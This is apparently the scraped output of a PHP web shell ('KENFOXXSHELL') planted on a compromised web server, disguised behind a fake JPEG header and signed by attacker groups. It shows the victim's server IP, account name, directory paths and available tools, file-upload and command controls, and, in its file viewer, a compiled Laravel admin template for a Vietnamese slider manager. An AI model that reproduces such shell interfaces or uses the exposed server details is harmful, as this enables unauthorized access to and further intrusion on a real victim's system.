JFIFHHC     C  " 5????! ??? Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/public_html/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/public_html/storage/framework/views/5d5348470b08be25dd27f35b6a92a41de48e83a0.php
<?php $__env->startSection('content'); ?>
<?php $__env->startSection('controller','Quản lý '.$trang); ?>
<?php $__env->startSection('action','Add'); ?>
<!-- Content Header (Page header) -->
<section class="content-header">
  <h1>
   	<?php echo $__env->yieldContent('controller'); ?>
    <small><?php echo $__env->yieldContent('action'); ?></small>
  </h1>
  <ol class="breadcrumb">
    <li><a href="admin"><i class="fa fa-dashboard"></i> Home</a></li>
    <li><a href="javascript:"><?php echo $__env->yieldContent('controller'); ?></a></li>
    <li class="active"><?php echo $__env->yieldContent('action'); ?></li>
  </ol>
</section>
<!-- Main content -->
<section class="content">
  
    <div class="box">
    	<?php echo $__env->make('admin.messages_error', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>
        <div class="box-body">
        	
        	<form name="frmAdd" method="post" action="<?php echo route('admin.slider.postAdd'); ?>" enctype="multipart/form-data">
        		<input type="hidden" name="_token" value="<?php echo csrf_token(); ?>" />
          		<div class="col-md-6 col-xs-12">
					<div class="form-group col-md-12 <?php if($errors->first('fImages')!=''): ?> has-error <?php endif; ?>">
					
                        <img  id="output" style="width: 150px;"/>
                        <input class="max-with" name="fImages" type="file"  onchange="loadFile(event)"/>
                           
                        
                        
				    	<?php if($errors->first('fImages')!=''): ?>
				      	<label class="control-label" for="inputError"><i class="fa fa-times-circle-o"></i> <?php echo $errors->first('fImages');; ?></label>
				      	<?php endif; ?>
					</div>
                     <?php if(@$_GET['type'] == "hinh-anh"){?>
					 <div class="form-group col-md-12 <?php if($errors->first('fImages2')!=''): ?> has-error <?php endif; ?>">
						<label for="file">Icon logo trên slide</label>
				     	<input type="file" id="file" name="fImages2" >
				    	<p class="help-block">Width:61px - Height: 61px</p>
				    	<?php if($errors->first('fImages2')!=''): ?>
				      	<label class="control-label" for="inputError"><i class="fa fa-times-circle-o"></i> <?php echo $errors->first('fImages2');; ?></label>
				      	<?php endif; ?>
					</div>
                    <?php } ?>
					<div class="clearfix"></div>
			    	<div class="form-group <?php if($errors->first('txtName')!=''): ?> has-error <?php endif; ?>">
				      	<label for="ten">Tiêu đề(Tiếng việt)</label>
				      	<input type="text" id="txtName" name="txtName" value=""  class="form-control" />
				      	<?php if($errors->first('txtName')!=''): ?>
				      	<label class="control-label" for="inputError"><i class="fa fa-times-circle-o"></i> <?php echo $errors->first('txtName');; ?></label>
				      	<?php endif; ?>
					</div>
                    <?php if(@$_GET['type'] == "hinh-anh"){?>
					<div class="form-group>
				      	<label for="ten">Tiêu đề(English)</label>
				      	<input type="text"  name="txtName_eg" value=""  class="form-control" />
				   </div>
                   <?php } ?>
                   <?php if(@$_GET['type'] == "home"){?>
						<div class="form-group">
					      	<label for="alias">Link</label>
					      	<input type="text" name="txtLink" id="txtLink"  class="form-control" />
						</div>
                        <div class="form-group">
                            <select name="display" id="jumpMenu">
                                <option value="0">--- Chọn kiểu xuất hiện trang chủ ---</option>
                                <option value="1"> Xuất hiện trang chủ (Dưới Gói SP)</option>
                                <option value="2"> Xuất hiện trang chủ (In the press)</option>
                            </select>
                        </div>
                    <?php } ?>
                    <?php if(@$_GET['type'] == "hinh-anh"){?>
					<div class="form-group">
				      	<label for="ten">Mô tả(Tiếng việt)</label>
				   		<textarea class="form-control" name="txtContent" required="required" placeholder="Mô tả"></textarea>
					</div>
					<div class="form-group">
				      	<label for="ten">Mô tả(English)</label>
				   		<textarea class="form-control" name="txtContent_eg" required="required" placeholder="Mô tả tiếng anh"></textarea>
					</div>
				    <?php } ?>
					<input type="hidden" name="txtCom" value="<?php echo e(@$_GET['type']); ?>"/>
				</div>
			
	            <div class="clearfix"></div>
			    <div class="col-md-6">
			    	<div class="form-group">
					      <label for="ten">Số thứ tự</label>
					      <input type="number" min="1" name="stt" value="<?php echo count($data)+1; ?>" class="form-control" style="width: 100px;">
				    </div>
				    
				    <div class="form-group">
					    <label>
				        	<input type="checkbox" name="status" checked="checked"> Hiển thị
				    	</label>
				    </div>
			    	
			    </div>			    
				<div class="clearfix"></div>
			    <div class="box-footer">
			    	<div class="row">
						<div class="col-md-6">
					    	<button type="submit" class="btn btn-primary">Lưu</button>
					    	<button type="button" onclick="javascript:window.location='admin/slider?type=<?php echo e(@$_GET[type]); ?>'" class="btn btn-danger">Thoát</button>
				    	</div>
			    	</div>
			  	</div>
		    </form>
        </div><!-- /.box-body -->
    </div><!-- /.box -->
    
</section><!-- /.content -->

<?php $__env->stopSection(); ?>

<?php echo $__env->make('admin.master', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Anon7 - 2022
AnonSec Team